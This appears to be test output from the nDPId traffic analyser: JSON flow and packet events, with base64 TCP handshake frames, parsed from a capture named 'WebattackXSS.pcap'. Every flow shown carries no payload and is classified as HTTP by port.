-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1499347191300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347191300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a9VAAD4GWgOsEAABwKgKMtUmAFBoHamZoviBF4AQAOWYgwAAAQEICgE5wkwD45PC"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347192547,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347192547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NKNAAD4GkS2sEAABwKgKMtU0AFBlD\/cgAAAAAKACchBokgAAAgQFtAQCCAoBOcODAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1TRgTBA1ZQ\/3IaAScSBgEgAAAgQFtAQCCAoD45T6ATnDgwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1499347192547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NKRAAD4GkTSsEAABwKgKMtU0AFBlD\/chYEwQNoAQAOX\/GAAAAQEICgE5w4QD45T6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347195099,"flow_last_seen":1499347195099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347195099,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1499347195099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oYJAAD4GJE6sEAABwKgKMtVOAFAI3GeAAAAAAKACchBRzQAAAgQFtAQCCAoBOcYCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1499347195099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1U4LxrqfCNxngaAScSDw6gAAAgQFtAQCCAoD45d4ATnGAgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1499347195100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347195100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oYNAAD4GJFWsEAABwKgKMtVOAFAI3GeBC8a6oIAQAOWP8gAAAQEICgE5xgID45d4"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347196341,"flow_last_seen":1499347196341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347196341,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1499347196341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LeJAAD4Gl+6sEAABwKgKMtVcAFCW1uraAAAAAKACchA\/NAAAAgQFtAQCCAoBOcc4AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1499347196341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Vx\/2Nugltbq26AScSBICAAAAgQFtAQCCAoD45iuATnHOAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1499347196342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347196342,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LeNAAD4Gl\/WsEAABwKgKMtVcAFCW1urbf9jboYAQAOXnDwAAAQEICgE5xzgD45iu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347197627,"flow_last_seen":1499347197627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347197627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1499347197627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jKtAAD4GOSWsEAABwKgKMtVqAFDoUUTRAAAAAKACchCScgAAAgQFtAQCCAoBOch6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1499347197628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1WoUz7Ep6FFE0qAScSAvhQAAAgQFtAQCCAoD45nwATnIegEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1499347197628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347197628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jKxAAD4GOSysEAABwKgKMtVqAFDoUUTSFM+xKoAQAOXOjAAAAQEICgE5yHoD45nw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347200170,"flow_last_seen":1499347200170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347200170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1499347200170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8egdAAD4GS8msEAABwKgKMtWEAFAb8rDyAAAAAKACchDwGwAAAgQFtAQCCAoBOcr1AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1499347200171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1YQCBmJ3G\/Kw86AScSDsLQAAAgQFtAQCCAoD45xsATnK9QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1499347200171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347200171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eghAAD4GS9CsEAABwKgKMtWEAFAb8rDzAgZieIAQAOWLNAAAAQEICgE5yvYD45xs"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347201471,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JERAAD4GoYysEAABwKgKMtWSAFCOe+h\/AAAAAKACchBEsQAAAgQFtAQCCAoBOcw7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1499347201471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ZJxUzmIjnvogKAScSD5HwAAAgQFtAQCCAoD452xATnMOwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1499347201472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347201472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JEVAAD4GoZOsEAABwKgKMtWSAFCOe+iAcVM5iYAQAOWYJwAAAQEICgE5zDsD452x"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347078168,"flow_last_seen":1499347083634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347079449,"flow_last_seen":1499347084635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347080793,"flow_last_seen":1499347086636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 